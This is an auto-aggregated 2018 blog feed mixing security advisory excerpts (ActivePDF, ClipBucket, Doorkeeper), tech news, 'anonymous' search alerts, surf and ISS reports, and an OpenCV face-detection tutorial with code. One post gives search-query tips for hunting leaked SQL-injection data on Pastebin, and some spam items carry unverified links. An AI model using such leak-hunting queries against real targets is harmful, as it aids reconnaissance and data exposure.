Source: Gmail -> IFTTT-> Blogger

[FD] ActivePDF Toolkit < 8.1.0 multiple RCE

ActivePDF Toolkit < 8.1.0 multiple RCE Introduction ============ The ActivePDF Toolkit is a Windows library which enhances business processes to stamp, stitch, merge, form-fill, add digital signatures, barcodes to PDF. Both .NET and native APIs are provided. Amongst many other operations, this library can be used by applications to transform images to PDF files. Multiple vulnerabilities were identified in the Pictview image processing library embedded by the Toolkit and signed by ActivePDF. They could allow remote attackers to compromise applications relying on the Toolkit to process untrusted images. Note that, while the example instances hereafter use “exotic” file types, the parser determines the image type from magic bytes, ignoring file extensions in most cases. CVE === CVE-2018-7264 Affected versions ================= ActivePDF Toolkit before 8.1.0 (build 8.1.0.19023) Author ====== François Goichon - Google Security Team CVE-2018-7264 ============= ActivePDF Toolkit < 8.1.0.19023 multiple RCE Summary

Source: Gmail -> IFTTT-> Blogger

Security Analyst

View details and apply for this security analyst job in East London (E1W) with Anonymous on CWJobs. Security Analyst : Global FTSE 250 Company Our FTSE 250 market leading company, has an exciting opportunity for a Security Analyst to join their Information Technology department in London.

from Google Alert - anonymous http://ift.tt/2CoELUq
via IFTTT

ISS Daily Summary Report – 2/26/2018

52Soyuz Landing Preparations: Crew and ground teams continued to prepare for tomorrow’s planned 52S Undock and landing. 52S is scheduled to undock tomorrow at 5:09 PM CST with landing at 8:31 PM CST. Today’s activities included packing 52S with return cargo, Emergency Roles and Responsibilities Review, and Change of Command Ceremony. Lighting Effects: Upon wake … Continue reading

from ISS On-Orbit Status Report http://ift.tt/2HP8J3i
via IFTTT

I have a new follower on Twitter

Mark Bland
▪️ Host of @theqnow ▪️Music Exec w/ a couple plaques▪️Former Pro Wrestler ▪️ #Stl Native 💯▪️.262 batting average in softball https://t.co/Tvkw8CsV8O
St Louis, MO/World Wide
https://t.co/xIuwPorgDD
Following: 16676 - Followers: 87837

February 27, 2018 at 10:07AM via Twitter http://twitter.com/markbland

Hacker Who Never Hacked Anyone Gets 33-Month Prison Sentence

A hacker who was arrested and pleaded guilty last year—not because he hacked someone, but for creating and selling a remote access trojan that helped cyber criminals—has finally been sentenced to serve almost three years in prison. Taylor Huddleston, 26, of Hot Springs, Arkansas, pleaded guilty in July 2017 to one charge of aiding and abetting computer intrusions by building and intentionally

from The Hacker News http://ift.tt/2F5PeVD
via IFTTT

mlp/ - Magicless Anonymous #28

Magicless Anonymous #28 - "/mlp/ - Pony" is 4chan's imageboard dedicated to the discussion of My Little Pony: Friendship is Magic.

from Google Alert - anonymous http://ift.tt/2HRBkoG
via IFTTT

8th St.'s surf is at least 9.54ft high

Maryland-Delaware, March 05, 2018 at 02:00AM

8th St. Summary
At 2:00 AM, surf min of 9.54ft. At 8:00 AM, surf min of 9.59ft. At 2:00 PM, surf min of 9.54ft. At 8:00 PM, surf min of 9.35ft.

Surf maximum: 11.39ft (3.47m)
Surf minimum: 9.54ft (2.91m)
Tide height: 0.32ft (0.1m)
Wind direction: NNE
Wind speed: 7.29 KTS

from Surfline http://ift.tt/1kVmigH
via IFTTT

[FD] SEC Consult SA-20180227-0 :: OS command injection, arbitrary file upload & SQL injection in ClipBucket

SEC Consult Vulnerability Lab Security Advisory < 20180227-0 > ======================================================================= title: OS command injection, arbitrary file upload & SQL injection product: ClipBucket vulnerable version: <4.0.0 - Release 4902 fixed version: 4.0.0 - Release 4902 CVE number: - impact: critical homepage: http://clipbucket.com/ found: 2017-09-06 by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur) Wan Ikram (Office Kuala Lumpur) Fikri Fadzil (Office Kuala Lumpur) Jasveer Singh (Office Kuala Lumpur) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal Moscow - Munich - Kuala Lumpur - Singapore Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com ======================================================================= Vendor description:

Source: Gmail -> IFTTT-> Blogger

AKG Anonymous Beethoven Painting c1910 t

top/womens-vintage-shoes-c-67_68_87_88_482_483/chaussures-escarpins-cuir-daim-noir-t-37-miss-roberta-talons-p-390. top/las-vegas-nv-nevada-street-scene-vintage-hand-painted-china-shoe-nico-japan-p-371. 4050155396295, Kunst für Alle Kunstreproduktion: AKG Anonymous, Bettina von ...

from Google Alert - anonymous http://ift.tt/2FBH6Ks
via IFTTT

Any anonymous claiming of UBTC offers out there BitcoinAirdrops

Any anonymous claiming of UBTC offers out there BitcoinAirdrops. You will have to use private keys by sweeping them you will be able to claim once it will be ready at the end of this month. Please avoid repetition — /r/BitcoinAirdrops is a subreddit devoted to new information and discussion about ...

from Google Alert - anonymous http://ift.tt/2EWPanJ
via IFTTT

Looking for a way to post anonymously

It did not take long to hear from a YouTube spokesperson who wanted to make it clear that the, "change won't affect your ability to choose []3 Feb 2015 The easiest way to track down the company behind an anonymous job posting is to do a search for a piece of the job description. An anonymous post is ...

from Google Alert - anonymous http://ift.tt/2Fz3CDw
via IFTTT

Can't disable google maps file loading

Bh @ js?key=:98 Google Maps API warning: NoApiKeys http://ift.tt/1Lj5JMz fC.j @ util.js:237 (anonymous) @ js?key=:146 (anonymous) @ js?key=:62 (anonymous) @ js?key=:60 (anonymous) @ js?key=:62 (anonymous) ...

from Google Alert - anonymous http://ift.tt/2EU3eT0
via IFTTT

Phone-Cracking Firm Found a Way to Unlock Any iPhone Model

Remember the infamous encryption fight between Apple and the FBI for unlocking an iPhone belonging to a terrorist behind the San Bernardino mass shooting that took place two years ago? After Apple refused to help the feds access data on the locked iPhone, the FBI eventually paid over a million dollar to a third-party company for unlocking the shooter's iPhone 5c. Now, it appears that the

from The Hacker News http://ift.tt/2CKQXun
via IFTTT

Monday, February 26, 2018

Customizing the anonymous welcome page

Customizing the anonymous welcome page. Last updated on. 26 February 2018. As an administrator, you can make changes to most of your Drupal Commons website by clicking an entity's gear menu and editing its values. Unfortunately, you cannot use this method with the welcome page displayed ...

from Google Alert - anonymous http://ift.tt/2CJteKY
via IFTTT

large crowd of anonymous blurred people at a trade show hall

large crowd of anonymous blurred people at a trade show hall - Buy this stock photo and explore similar images at Adobe Stock.

from Google Alert - anonymous http://ift.tt/2Co56Sw
via IFTTT

San Benito High School Anonymous Tip Line

San Benito High School Anonymous Tip Line. 831-637-5831 x403. Get in Touch. Contáctenos. 1220 Monterey Street Hollister, CA 95023 831-637-5831. Non-Discrimination Statement · Declaración Contra la Discriminación. © 2018 San Benito High School District. All Rights Reserved.

from Google Alert - anonymous http://ift.tt/2oyqx9X
via IFTTT

Orioles P Kevin Gausman leaves Monday's game vs. Tigers after collision at home plate (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Chauffeur in Worthing (BN14) | Anonymous

View details and apply for this chauffeur job in Worthing (BN14) with Anonymous on totaljobs. Chauffeur to drive company director's vehicle.

from Google Alert - anonymous http://ift.tt/2orHsfa
via IFTTT

Assistant general manager

View details and apply for this assistant general manager job in Brighton (BN1) with Anonymous Recruiter on Caterer.com. Assistant Restaurant / Bar General Manager We are looking for a keen, motivated, and experienced Assistant Restaurant / Bar General Manager to undertake the management of ...

from Google Alert - anonymous http://ift.tt/2ovtmbQ
via IFTTT

fusion360-anonymous on Sketchfab - Sketchfab

fusion360-anonymous - See fusion360-anonymous profile and 3D models on Sketchfab.

from Google Alert - anonymous http://ift.tt/2osFOd4
via IFTTT

Offseason QB Confidence Index: How the Ravens feel about their depth chart (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Flaw in Popular μTorrent Software Lets Hackers Control Your PC Remotely

If you have installed world's most popular torrent download software, μTorrent, then you should download its latest version for Windows as soon as possible. Google's security researcher at Project Zero discovered a serious remote code execution vulnerability in both the 'μTorrent desktop app for Windows' and newly launched 'μTorrent Web' that allows users to download and stream torrents

from The Hacker News http://ift.tt/2F6ZaOp
via IFTTT

Face detection with OpenCV and deep learning

Today I’m going to share a little known secret with you regarding the OpenCV library:

You can perform fast, accurate face detection with OpenCV using a pre-trained deep learning face detector model shipped with the library.

You may already know that OpenCV ships out-of-the-box with pre-trained Haar cascades that can be used for face detection…

…but I’m willing to bet that you don’t know about the “hidden” deep learning-based face detector that has been part of OpenCV since OpenCV 3.3.

In the remainder of today’s blog post I’ll discuss:

Where this “hidden” deep learning face detector lives in the OpenCV library
How you can perform face detection in images using OpenCV and deep learning
How you can perform face detection in video using OpenCV and deep learning

As we’ll see, it’s easily to swap out Haar cascades for their more accurate deep learning face detector counterparts.

To learn more about face detection with OpenCV and deep learning, just keep reading!

Looking for the source code to this post?
Jump right to the downloads section.

Face detection with OpenCV and deep learning

Today’s blog post is broken down into three parts.

In the first part we’ll discuss the origin of the more accurate OpenCV face detectors and where they live inside the OpenCV library.

From there I’ll demonstrate how you can perform face detection in images using OpenCV and deep learning.

I’ll then wrap up the blog post discussing how you can apply face detection to video streams using OpenCV and deep learning as well.

Where do these “better” face detectors live in OpenCV and where did they come from?

Back in August 2017, OpenCV 3.3 was officially released, bringing it with it a highly improved “deep neural networks” (

dnn

) module.

This module supports a number of deep learning frameworks, including Caffe, TensorFlow, and Torch/PyTorch.

The primary contributor to the

dnn

module, Aleksandr Rybnikov, has put a huge amount of work into making this module possible (and we owe him a big round of thanks and applause).

And since the release of OpenCV 3.3, I’ve been sharing a number of deep learning OpenCV tutorials, including:

However, what most OpenCV users do not know is that Rybnikov has included a more accurate, deep learning-based face detector included in the official release of OpenCV (although it can be a bit hard to find if you don’t know where to look).

The Caffe-based face detector can be found in the

face_detector

sub-directory of the dnn samples:

Figure 1: The OpenCV repository on GitHub has an example of deep learning face detection.

When using OpenCV’s deep neural network module with Caffe models, you’ll need two sets of files:

The .prototxt file(s) which define the model architecture (i.e., the layers themselves)
The .caffemodel file which contains the weights for the actual layers

Both files are required to when using models trained using Caffe for deep learning.

However, you’ll only find the prototxt files here in the GitHub repo.

The weight files are not included in the OpenCV

samples

directory and it requires a bit more digging to find them…

Where can I can I get the more accurate OpenCV face detectors?

For your convenience, I have included both the:

Caffe prototxt files
and Caffe model weight files

…inside the “Downloads” section of this blog post.

To skip to the downloads section, just click here.

How does the OpenCV deep learning face detector work?

Figure 2: Deep Learning with OpenCV’s DNN module.

OpenCV’s deep learning face detector is based on the Single Shot Detector (SSD) framework with a ResNet base network (unlike other OpenCV SSDs that you may have seen which typically use MobileNet as the base network).

A full review of SSDs and ResNet is outside the scope of this blog post, so if you’re interested in learning more about Single Shot Detectors (including how to train your own custom deep learning object detectors), start with this article here on the PyImageSearch blog and then take a look at my book, Deep Learning for Computer Vision with Python, which includes in-depth discussions and code enabling you to train your own object detectors.

Face detection in images with OpenCV and deep learning

In this first example we’ll learn how to apply face detection with OpenCV to single input images.

In the next section we’ll learn how to modify this code and apply face detection with OpenCV to videos, video streams, and webcams.

Open up a new file, name it

detect_faces.py

, and insert the following code:

# import the necessary packages
import numpy as np
import argparse
import cv2

# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--image", required=True,
        help="path to input image")
ap.add_argument("-p", "--prototxt", required=True,
        help="path to Caffe 'deploy' prototxt file")
ap.add_argument("-m", "--model", required=True,
        help="path to Caffe pre-trained model")
ap.add_argument("-c", "--confidence", type=float, default=0.5,
        help="minimum probability to filter weak detections")
args = vars(ap.parse_args())

Here we are importing our required packages (Lines 2-4) and parsing command line arguments (Lines 7-16).

We have three required arguments:

```
--image
```
: The path to the input image.
```
--prototxt
```
: The path to the Caffe prototxt file.
```
--model
```
: The path to the pretrained Caffe model.

An optional argument,

--confidence

, can overwrite the default threshold of 0.5 if you wish.

From there lets load our model and create a blob from our image:

# load our serialized model from disk
print("[INFO] loading model...")
net = cv2.dnn.readNetFromCaffe(args["prototxt"], args["model"])

# load the input image and construct an input blob for the image
# by resizing to a fixed 300x300 pixels and then normalizing it
image = cv2.imread(args["image"])
(h, w) = image.shape[:2]
blob = cv2.dnn.blobFromImage(cv2.resize(image, (300, 300)), 1.0,
        (300, 300), (104.0, 177.0, 123.0))

First, we load our model using our

--prototxt

and

--model

file paths. We store the model as

net

(Line 20).

Then we load the

image

(Line 24), extract the dimensions (Line 25), and create a

blob

(Lines 26 and 27).

The

dnn.blobFromImage

takes care of pre-processing which includes setting the

blob

dimensions and normalization. If you’re interested in learning more about the

dnn.blobFromImage

function, I review in detail in this blog post.

Next, we’ll apply face detection:

# pass the blob through the network and obtain the detections and
# predictions
print("[INFO] computing object detections...")
net.setInput(blob)
detections = net.forward()

To detect faces, we pass the

blob

through the

net

on Lines 32 and 33.

And from there we’ll loop over the

detections

and draw boxes around the detected faces:

# loop over the detections
for i in range(0, detections.shape[2]):
        # extract the confidence (i.e., probability) associated with the
        # prediction
        confidence = detections[0, 0, i, 2]

        # filter out weak detections by ensuring the `confidence` is
        # greater than the minimum confidence
        if confidence > args["confidence"]:
                # compute the (x, y)-coordinates of the bounding box for the
                # object
                box = detections[0, 0, i, 3:7] * np.array([w, h, w, h])
                (startX, startY, endX, endY) = box.astype("int")
 
                # draw the bounding box of the face along with the associated
                # probability
                text = "{:.2f}%".format(confidence * 100)
                y = startY - 10 if startY - 10 > 10 else startY + 10
                cv2.rectangle(image, (startX, startY), (endX, endY),
                        (0, 0, 255), 2)
                cv2.putText(image, text, (startX, y),
                        cv2.FONT_HERSHEY_SIMPLEX, 0.45, (0, 0, 255), 2)

# show the output image
cv2.imshow("Output", image)
cv2.waitKey(0)

We begin looping over the detections on Line 36.

From there, we extract the

confidence

(Line 39) and compare it to the confidence threshold (Line 43). We perform this check to filter out weak detections.

If the confidence meets the minimum threshold, we proceed to draw a rectangle and along with the probability of the detection on Lines 46-56.

To accomplish this, we first calculate the (x, y)-coordinates of the bounding box (Lines 46 and 47).

We then build our confidence

text

string (Line 51) which contains the probability of the detection.

In case the our

text

would go off-image (such as when the face detection occurs at the very top of an image), we shift it down by 10 pixels (Line 52).

Our face rectangle and confidence

text

is drawn on the

image

on Lines 53-56.

From there we loop back for additional detections following the process again. If no

detections

remain, we’re ready to show our output

image

on the screen (Lines 59 and 60).

Face detection in images with OpenCV results

Let’s try out the OpenCV deep learning face detector.

Make sure you use the “Downloads” section of this blog post to download:

The source code used in this blog post
The Caffe prototxt files for deep learning face detection
The Caffe weight files used for deep learning face detection
The example images used in this post

From there, open up a terminal and execute the following command:

$ python detect_faces.py --image rooster.jpg --prototxt deploy.prototxt.txt \
        --model res10_300x300_ssd_iter_140000.caffemodel

Figure 3: My face is detected in this image with 74% confidence using the OpenCV deep learning face detector.

The above photo is of me during my first trip to Ybor City in Florida, where chickens are allowed to roam free throughout the city. There are even laws protecting the chickens which I thought was very cool. Even though I grew up in rural farmland, I was still totally surprised to see a rooster crossing the road — which of course spawned many “Why did the chicken cross the road?” jokes.

Here you can see my face is detected with 74.30% confidence, even though my face is at an angle. OpenCV’s Haar cascades are notorious for missing faces that are not at a “straight on” angle, but by using OpenCV’s deep learning face detectors, we are able to detect my face.

And now we’ll see how another example works, this time with three faces:

$ python detect_faces.py --image iron_chic.jpg --prototxt deploy.prototxt.txt \
        --model res10_300x300_ssd_iter_140000.caffemodel

Figure 4: The OpenCV DNN face detector finds all three images without any trouble.

This photo was taken in Gainesville, FL after one of my favorite bands finished up a show at Loosey’s, a popular bar and music venue in the area. Here you can see my fiance (left), me (middle), and Jason (right), a member of the band.

I’m incredibly impressed that OpenCV can detect Trisha’s face, despite the lighting conditions and shadows cast on her face in the dark venue (and with 86.81% probability!)

Again, this just goes to show how much better (in terms of accuracy) the deep learning OpenCV face detectors are over their standard Haar cascade counterparts shipped with the library.

Face detection in video and webcam with OpenCV and deep learning

Now that we have learned how to apply face detection with OpenCV to single images, let’s also apply face detection to videos, video streams, and webcams.

Luckily for us, most of our code in the previous section on face detection with OpenCV in single images can be reused here!

Open up a new file, name it

detect_faces_video.py

, and insert the following code:

# import the necessary packages
from imutils.video import VideoStream
import numpy as np
import argparse
import imutils
import time
import cv2

# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-p", "--prototxt", required=True,
        help="path to Caffe 'deploy' prototxt file")
ap.add_argument("-m", "--model", required=True,
        help="path to Caffe pre-trained model")
ap.add_argument("-c", "--confidence", type=float, default=0.5,
        help="minimum probability to filter weak detections")
args = vars(ap.parse_args())

Compared to above, we will need to import three additional packages:

VideoStream

imutils

, and

time

If you don’t have

imutils

in your virtual environment, you can install it via:

$ pip install imutils

Our command line arguments are mostly the same, except we do not have an

--image

path argument this time. We’ll be using our webcam’s video feed instead.

From there we’ll load our model and initialize the video stream:

# load our serialized model from disk
print("[INFO] loading model...")
net = cv2.dnn.readNetFromCaffe(args["prototxt"], args["model"])

# initialize the video stream and allow the camera sensor to warm up
print("[INFO] starting video stream...")
vs = VideoStream(src=0).start()
time.sleep(2.0)

Loading the model is the same as above.

We initialize a

VideoStream

object specifying camera with index zero as the source (in general this would be your laptop’s built in camera or your desktop’s first camera detected).

A few quick notes here:

Raspberry Pi + picamera users can replace Line 25 with
```
vs = VideoStream(usePiCamera=True).start()
```
if you wish to use the Raspberry Pi camera module.
If you to parse a video file (rather than a video stream) swap out the
```
VideoStream
```
class for
```
FileVideoStream
```
. You can learn more about the FileVideoStream class in this blog post.

We then allow the camera sensor to warm up for 2 seconds (Line 26).

From there we loop over the frames and compute face detections with OpenCV:

# loop over the frames from the video stream
while True:
        # grab the frame from the threaded video stream and resize it
        # to have a maximum width of 400 pixels
        frame = vs.read()
        frame = imutils.resize(frame, width=400)
 
        # grab the frame dimensions and convert it to a blob
        (h, w) = frame.shape[:2]
        blob = cv2.dnn.blobFromImage(cv2.resize(frame, (300, 300)), 1.0,
                (300, 300), (104.0, 177.0, 123.0))
 
        # pass the blob through the network and obtain the detections and
        # predictions
        net.setInput(blob)
        detections = net.forward()

This block should look mostly familiar to the static image version in the previous section.

In this block, we’re reading a

frame

from the video stream (Line 32), creating a

blob

(Lines 37 and 38), and passing the

blob

through the deep neural

net

to obtain face detections (Lines 42 and 43).

We can now loop over the detections, compare to the confidence threshold, and draw face boxes + confidence values on the screen:

# loop over the detections
        for i in range(0, detections.shape[2]):
                # extract the confidence (i.e., probability) associated with the
                # prediction
                confidence = detections[0, 0, i, 2]

                # filter out weak detections by ensuring the `confidence` is
                # greater than the minimum confidence
                if confidence < args["confidence"]:
                        continue

                # compute the (x, y)-coordinates of the bounding box for the
                # object
                box = detections[0, 0, i, 3:7] * np.array([w, h, w, h])
                (startX, startY, endX, endY) = box.astype("int")
 
                # draw the bounding box of the face along with the associated
                # probability
                text = "{:.2f}%".format(confidence * 100)
                y = startY - 10 if startY - 10 > 10 else startY + 10
                cv2.rectangle(frame, (startX, startY), (endX, endY),
                        (0, 0, 255), 2)
                cv2.putText(frame, text, (startX, y),
                        cv2.FONT_HERSHEY_SIMPLEX, 0.45, (0, 0, 255), 2)

For a detailed review of this code block, please review the previous section where we perform face detection to still, static images. The code here is nearly identical.

Now that our OpenCV face detections have been drawn, let’s display the frame on the screen and wait for a keypress:

# show the output frame
        cv2.imshow("Frame", frame)
        key = cv2.waitKey(1) & 0xFF
 
        # if the `q` key was pressed, break from the loop
        if key == ord("q"):
                break

# do a bit of cleanup
cv2.destroyAllWindows()
vs.stop()

We display the

frame

on the screen until the “q” key is pressed at which point we

break

out of the loop and perform cleanup.

Face detection in video and webcam with OpenCV results

To try out the OpenCV deep learning face detector make sure you use the “Downloads” section of this blog post to grab:

The source code used in this blog post
The Caffe prototxt files for deep learning face detection
The Caffe weight files used for deep learning face detection

Once you have downloaded the files, running the deep learning OpenCV face detector with a webcam feed is easy with this simple command:

$ python detect_faces_video.py --prototxt deploy.prototxt.txt \
        --model res10_300x300_ssd_iter_140000.caffemodel

Figure 5: Face detection in video with OpenCV’s DNN module.

You can see a full video demonstration, including my commentary, in the following video:

Summary

In today’s blog post you discovered a little known secret about the OpenCV library — OpenCV ships out-of-the-box with a more accurate face detector (as compared to OpenCV’s Haar cascades).

The more accurate OpenCV face detector is deep learning based, and in particular, utilizes the Single Shot Detector (SSD) framework with ResNet as the base network.

Thanks to the hard work of Aleksandr Rybnikov and the other contributors to OpenCV’s

dnn

module, we can enjoy these more accurate OpenCV face detectors in our own applications.

The deep learning face detectors can be hard to find in the OpenCV library, so
for your convenience, I have put gathered the Caffe prototxt and weight files for you — just use the “Downloads” form below to download the (more accurate) deep learning-based OpenCV face detector.

See you next week with another great computer vision + deep learning tutorial!

Downloads:

The post Face detection with OpenCV and deep learning appeared first on PyImageSearch.

from PyImageSearch http://ift.tt/2CnHc9G
via IFTTT

Will anonymous external sharing be disabled: New ways to govern access of external users

Hello, we just received the Major Update Notification: New ways to govern access of external users are coming to Office 365. When I read the accompanied KB I conclude that external anonymous sharing will not work anymore after this date. And that when using Office365 groups in collaboration with ...

from Google Alert - anonymous http://ift.tt/2CJ5u9M
via IFTTT

ISS Daily Summary Report – 2/23/2018

Lighting Effects: Upon wakeup, the 53S subject provided a sleep log entry and conducted a series of three Cognition tests and provided urine samples over a 24-hour period. The samples will be stowed in the MELFI for freezing until their return and analysis. The Lighting Effects investigation studies the impact of the change from fluorescent … Continue reading

from ISS On-Orbit Status Report http://ift.tt/2CJ99Eu
via IFTTT

8th St.'s surf is at least 9.04ft high

Maryland-Delaware, March 04, 2018 at 02:00AM

8th St. Summary
At 2:00 AM, surf min of 9.04ft. At 8:00 AM, surf min of 9.36ft. At 2:00 PM, surf min of 9.41ft. At 8:00 PM, surf min of 9.43ft.

Surf maximum: 10.8ft (3.29m)
Surf minimum: 9.04ft (2.75m)
Tide height: -0.52ft (-0.16m)
Wind direction: N
Wind speed: 11.35 KTS

from Surfline http://ift.tt/1kVmigH
via IFTTT

nodebb-plugin-anonymous

Anonymous Plugin for NodeBB. how? learn more · fengxingwei published just now; 0.0.1 is the latest release; github.com/whenjs/nodebb-plugin-anonymous · MIT ...

from Google Alert - anonymous http://ift.tt/2CHW4LQ
via IFTTT

Android P Will Block Background Apps from Accessing Your Camera, Microphone

Yes, your smartphone is spying on you. But, the real question is, should you care? We have published thousands of articles on The Hacker News, warning how any mobile app can turn your smartphone into a bugging device—'Facebook is listening to your conversations', 'Stealing Passwords Using SmartPhone Sensors', 'Your Headphones Can Spy On You' and 'Android Malware Found Spying Military

from The Hacker News http://ift.tt/2BOZfEC
via IFTTT

Passing Jupiter

Here comes Jupiter! NASA's robotic spacecraft Juno is continuing on its 53-day, highly-elongated orbits around our Solar System's largest planet. The featured video is from perijove 11, the eleventh time Juno has passed near Jupiter since it arrived in mid-2016. This time-lapse, color-enhanced movie covers about four hours and morphs between 36 JunoCam images. The video begins with Jupiter rising as Juno approaches from the north. As Juno reaches its closest view -- from about 3,500 kilometers over Jupiter's cloud tops -- the spacecraft captures the great planet in tremendous detail. Juno passes light zones and dark belt of clouds that circle the planet, as well as numerous swirling circular storms, many of which are larger than hurricanes on Earth. After the perijove, Jupiter recedes into the distance, now displaying the unusual clouds that appear over Jupiter's south. To get desired science data, Juno swoops so close to Jupiter that its instruments may soon fail due to exposure to high levels of radiation. Because of this, in part, the Juno mission is currently schedule to conclude in mid-2018, at perijove 14, when the spacecraft will be directed to dive into Jupiter's atmosphere and melt. via NASA http://ift.tt/2FvQzTt

Sunday, February 25, 2018

Orioles and 1B/DH Pedro Alvarez agree to minor league contract - multiple reports (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

philadelphia76ersvswashingtonlivestream

philadelphia76ersvswashingtonlivestream. Watch Live>>> http://bit.ly/2ESKYp1. first time all season, the San Antonio Spurs are showing signs of wavering. ... As for their opponent, the Cleveland Cavaliers are looking to bounce back after suffering their first defeat since revamping the first time all season ...

from Google Alert - anonymous http://ift.tt/2BPTUwK
via IFTTT

Toby K. (Unity Day, 2018)

Toby K. (Unity Day, 2018). February 25, 2018 S LT. Toby K. (Unity Day, 2018). OASF. Share. ← Peggy W. (Unity Day, 2018)Trish T. (Century Meeting) → · MEETINGS EVENTS FOR NEWCOMERS FOR MEDICAL PROFESSIONALS About OASF IntergrouP OA WORLD SERVICE. To suggest updates to ...

from Google Alert - anonymous http://ift.tt/2F4vhyd
via IFTTT

anonymous galaxy

from Google Alert - anonymous http://ift.tt/2FttD7b
via IFTTT

atlantanascar2018livestream

atlantanascar2018livestream. Watch Live>>> http://ift.tt/2FttBw5. Folds of Honor QuikTrip 500 from Atlanta Motor Speedway. The start time of the race was moved up one hour to 1 p.m. ET (Fox, Fox Sports Go) because of inclement weather. Kyle Busch has the pole position thanks .Folds of ...

from Google Alert - anonymous http://ift.tt/2ETa4UI
via IFTTT

Anonymous user 3743a8

Name, Anonymous user 3743a8. User since, Feb. 25, 2018. Number of add-ons developed, 1 theme. Average rating of developer's add-ons, Not yet rated ...

from Google Alert - anonymous http://ift.tt/2ETa1Iw
via IFTTT

Progress Continues On Anonymous Bitcoin Transactions

For a long time, bitcoin has been perceived by many as an anonymous payment system for online purchases. This myth has been largely propagated by mass media when bitcoin emerged as a popular payment method on the dark web. However, this is far from the truth. Due to its publicly viewable ...

from Google Alert - anonymous http://ift.tt/2F0Xfv3
via IFTTT

[FD] Search engine of leaks

I started working with a leaks search engine and although it has some other bug, it is very complete. This search engine works with such sources that it analyzes from: 1) - Github 2) - Pastebin 3) -Robtex 4) - Shodan 5) - Censys 6) - Email Sherlock 7) - Threatcrowd 8) Alienvault 9) - Netcraft 10) -Shodan 11) - Threatminer. 12) - public ftps repos search engine: filemare 13) - Archive.is: A search engine like waybackmachine but graphic xD. 14) - Vulners: A database of exploits and organizations with bugs that have been reported. Tips to look for: use inurl. For example: Sqli inurl:pastebin OR Sqli inurl:vulners Both: Sqli inurl:pastebin OR inurl:vulners Link: http://ift.tt/2FyJaTq I await your opinions. Rootkit

Source: Gmail -> IFTTT-> Blogger

Re: [FD] [CVE-2018-1000088] Stored XSS vulnerability in Doorkeeper gem v2.1.0 - v4.2.5

[FD] [CVE-2018-1000088] Stored XSS vulnerability in Doorkeeper gem v2.1.0 - v4.2.5

Hey everyone, A security bulletin for you. Software:

Source: Gmail -> IFTTT-> Blogger

Re: [FD] Defense in depth -- the Microsoft way (part 51): Skype's home-grown updater allows escalation of privilege to SYSTEM

[FD] BSides Denver 2018 CFP is open

Greetings! Security BSides in the mile high city, Denver CO, is accepting submissions for speakers and presentations for our 2018 event. Our CFP submission form is online at: https://goo.gl/forms/ZEIlX9qkZDUAYGuw1 We look forward to your submissions and hope you can participate in our community event! www.BSidesDen.org - Jeff Pettorino

Source: Gmail -> IFTTT-> Blogger

8th St.'s surf is at least 5.69ft high

Maryland-Delaware, March 03, 2018 at 08:00AM

8th St. Summary
At 2:00 AM, surf min of 3.47ft. At 8:00 AM, surf min of 5.69ft. At 2:00 PM, surf min of 6.05ft. At 8:00 PM, surf min of 7.73ft.

Surf maximum: 6.81ft (2.07m)
Surf minimum: 5.69ft (1.74m)
Tide height: 4.03ft (1.23m)
Wind direction: NNE
Wind speed: 17.69 KTS

from Surfline http://ift.tt/1kVmigH
via IFTTT

"Unaccountable at the Founding: The Originalist Case for Anonymous Juri" by Kory A. Langhofer

Recommended Citation. Kory A. Langhofer, Unaccountable at the Founding: The Originalist Case for Anonymous Juries, 115 Yale L.J. (2006). Available at: http://ift.tt/2HJoQPX. Download ...

from Google Alert - anonymous http://ift.tt/2ETRHzd
via IFTTT

Geoip2 anonymous ip database download

Locations are often near the center of the population. mmdb' enterprise: 'GeoIP2-Enterprise' domain: 'GeoIP2-Domain. 101. postal_code, string, The postal code associated with the IP address. mmdb. . Use the GeoIP2 Anonymous IP database to identify anonymizers in support of geofiltering, ...

from Google Alert - anonymous http://ift.tt/2CHztyT
via IFTTT

AE Aurigae and the Flaming Star Nebula

Why is AE Aurigae called the flaming star? For one reason, the surrounding nebula IC 405 is named the Flaming Star Nebula because the region seems to harbor smoke, even though nothing is on fire, including interior star AE Aurigae. Fire, typically defined as the rapid molecular acquisition of oxygen, happens only when sufficient oxygen is present and is not important in such high-energy, low-oxygen environments. The material that appears as smoke is mostly interstellar hydrogen, but does contain smoke-like dark filaments of carbon-rich dust grains. The bright star AE Aurigae is visible near the nebula center and is so hot it is blue, emitting light so energetic it knocks electrons away from atoms in the surrounding gas. When an atom recaptures an electron, light is emitted creating the surrounding emission nebula. The Flaming Star nebula lies about 1,500 light years distant, spans about 5 light years, and is visible with a small telescope toward the constellation of the Charioteer (Auriga). via NASA http://ift.tt/2oAo2UP

Latest YouTube Video

Saturday, March 3, 2018

Friday, March 2, 2018

Thursday, March 1, 2018

Wednesday, February 28, 2018

Tuesday, February 27, 2018

Monday, February 26, 2018

Face detection with OpenCV and deep learning

Where do these “better” face detectors live in OpenCV and where did they come from?

Where can I can I get the more accurate OpenCV face detectors?

How does the OpenCV deep learning face detector work?

Face detection in images with OpenCV and deep learning

Face detection in images with OpenCV results

Face detection in video and webcam with OpenCV and deep learning

Face detection in video and webcam with OpenCV results

Summary

Downloads:

Sunday, February 25, 2018